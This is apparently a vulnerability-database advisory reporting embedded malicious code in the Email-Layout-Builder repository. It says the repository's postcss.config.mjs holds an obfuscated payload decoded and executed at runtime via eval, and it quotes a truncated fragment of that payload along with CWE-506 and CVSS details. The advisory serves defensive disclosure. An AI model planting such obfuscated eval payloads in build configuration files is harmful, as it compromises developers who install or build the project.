VDB

GCVE-110-OSM-2025-1082

GCVE-110-OSM-2025-1082
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published July 22, 2025
saif72437/Email-Layout-Builder contains code that runs without the user asking for it. - Carries an obfuscated payload that is decoded and executed at runtime. File: postcss.config.mjs Observed: '6a(8j]]cp()onbLxcRa.rne:8ie!)oRRRde%2exuq}l5..fe3R.5x;f}8)791.i3c)(#e=vd)r.R!5R}%tt!Er%GRRR<.g(RR)79Er6B6]t}$1{R]c4e!e+f4f7" eval(

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownall (affected)

Browse GCVE Records

386 records in the GCVE database · Updated September 16, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›